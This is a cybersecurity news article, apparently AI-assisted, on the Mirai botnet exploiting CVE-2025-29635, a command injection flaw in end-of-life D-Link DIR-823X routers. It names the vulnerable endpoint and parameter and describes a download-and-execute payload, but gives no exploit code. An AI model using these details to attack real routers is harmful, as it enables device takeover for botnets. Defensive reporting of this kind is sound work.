Listen to this Post
Introduction
A newly observed cyber campaign is targeting outdated network infrastructure, turning forgotten hardware into active entry points for large-scale botnet operations. Security researchers have confirmed that the Mirai botnet has begun exploiting a command injection vulnerability tracked as CVE-2025-29635, affecting discontinued D-Link DIR-823X routers. The flaw, rooted in improper input validation, allows attackers to execute system-level commands remotely through crafted requests. What makes this case particularly concerning is not just the vulnerability itself, but the timing of exploitation, emerging long after public disclosure and proof-of-concept availability. This signals a recurring pattern in cybercrime ecosystems where legacy devices become long-term attack surfaces, especially when vendors discontinue support while organizations fail to decommission or patch them.
Detailed the Incident
The Mirai botnet has been actively exploiting a critical command injection vulnerability identified as CVE-2025-29635, targeting D-Link DIR-823X routers that have reached end-of-life status.
The affected firmware versions include 240126 and 24082, both of which are vulnerable due to unsafe handling of attacker-controlled input values.
The vulnerability stems from improper validation of macaddr input, which is directly inserted into system commands without sanitization.
Attackers exploit this flaw by sending specially crafted POST requests to the /goform/set_prohibiting endpoint.
Once executed, the injected commands allow remote code execution on the device.
Akamai’s Security Intelligence and Response Team detected this activity in March 2026 through its global honeypot network.
This marks the first observed real-world exploitation since the vulnerability was publicly disclosed in March 2025.
Security researchers Wang Jinshuai and Zhao Jiangting reverse engineered the firmware and identified the vulnerable sub_42232C function.
They confirmed that snprintf is used to build command strings unsafely before execution via system().
A proof-of-concept exploit was later published on GitHub but subsequently removed.
At the time of discovery, the vulnerability had not yet been added to CISA’s Known Exploited Vulnerabilities catalog.
Attackers are leveraging similar request structures as the published PoC to automate exploitation.
Malicious payloads include shell commands designed to download and execute external malware.
The observed malware strain drops a Mirai variant known as “tuxnokill.”
This variant is distributed from an external IP address and supports multiple CPU architectures.
The payload uses XOR encoding with a fixed key to evade detection.
It contains standard Mirai strings consistent with known botnet behavior.
The malware connects to a command-and-control server on port 44300.
Indicators suggest the campaign is partially manually developed rather than fully automated.
The attackers are also combining multiple exploits, including CVE-2023-1389 and vulnerabilities in ZTE devices.
Mirai continues to be widely used due to its leaked source code availability.
This lowers the technical barrier for cybercriminals entering botnet operations.
Even less experienced actors can deploy functional malware campaigns using modified versions.
Some groups are experimenting with artificial intelligence to enhance vulnerability discovery.
Others reject AI, preferring traditional exploit development techniques.
Security experts highlight that outdated infrastructure remains a primary target for such campaigns.
Organizations frequently fail to patch or replace discontinued devices.
This creates long-term exposure windows that attackers actively exploit.
Akamai emphasizes the importance of timely patching and vulnerability monitoring.
The report includes IoCs and Yara rules to assist defenders in detection and mitigation.
What Undercode Say:
The exploitation of CVE-2025-29635 demonstrates a classic lifecycle of modern cyber threats where disclosure does not immediately lead to mitigation. Instead, there is often a delayed but inevitable wave of exploitation once proof-of-concept code becomes publicly available. In this case, the gap between disclosure and active exploitation was nearly one year, highlighting how attackers strategically wait for the ecosystem to lag behind.
Mirai’s continued relevance also reveals a deeper structural issue in cybersecurity, which is the persistence of vulnerable embedded systems in production environments long after official support ends.
Routers like the D-Link DIR-823X series become silent liabilities inside networks, often forgotten but still connected.
Attackers do not need sophisticated zero-day exploits when legacy infrastructure already provides a wide attack surface.
The simplicity of command injection vulnerabilities makes them particularly dangerous in embedded systems.
Once system() execution is possible, full device compromise becomes trivial.
The reuse of PoC code from public repositories accelerates exploitation cycles significantly.
Even if PoCs are removed later, they often persist across mirrors and underground forums.
Mirai’s architecture remains attractive because it is modular, lightweight, and easily customizable.
The addition of multiple exploits in a single campaign suggests coordinated threat actor behavior rather than isolated opportunistic attacks.
The inclusion of ZTE and TP-Link vulnerabilities alongside D-Link devices indicates a broad targeting strategy.
This reflects an ecosystem-level approach to botnet expansion rather than single-vendor focus.
The use of XOR encoding and hard-coded infrastructure suggests partially manual malware development.
This contradicts assumptions that modern botnets are fully automated.
Instead, hybrid models combining automation and manual control are becoming more common.
The involvement of AI in vulnerability research is still uneven across threat actors.
Some groups are clearly experimenting, while others rely on traditional reverse engineering.
The biggest weakness exploited here is not only software but operational negligence in device lifecycle management.
Organizations often fail to track firmware support timelines.
End-of-life devices remain active in enterprise networks longer than expected.
This creates invisible entry points for attackers.
The Mirai ecosystem continues to evolve by absorbing new vulnerabilities rapidly.
Each newly disclosed flaw becomes potential fuel for botnet expansion.
Defensive strategies must therefore focus on asset visibility as much as patching.
Without inventory awareness, mitigation efforts remain incomplete.
The report reinforces that vulnerability disclosure alone is insufficient.
Active monitoring and enforcement of decommissioning policies are essential.
Cybersecurity maturity is increasingly defined by how quickly organizations remove obsolete technology.
The persistence of Mirai shows that old threats do not disappear; they simply adapt.
This campaign is a reminder that legacy infrastructure is now a permanent battlefield in global cyber operations.
Fact Checker Results
CVE-2025-29635 is confirmed as a command injection vulnerability affecting D-Link DIR-823X routers. ✅
Akamai SIRT observed real-world exploitation through honeypot detection in March 2026. ⚠️
Mirai botnet continues to operate due to widespread reuse of leaked source code. ✅
Prediction
The exploitation of CVE-2025-29635 is likely to expand as exploit code circulates further in underground markets and botnet operators integrate it into automated scanning tools.
Older router models will continue to be primary targets because they remain widely deployed despite end-of-life status.
Future Mirai variants will likely combine multiple router and IoT exploits into unified mass-infection campaigns, increasing both speed and scale of global infections.
▶️ Related Video (82% Match):
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: securityaffairs.com
Extra Source Hub (Possible Sources for article):
https://www.linkedin.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
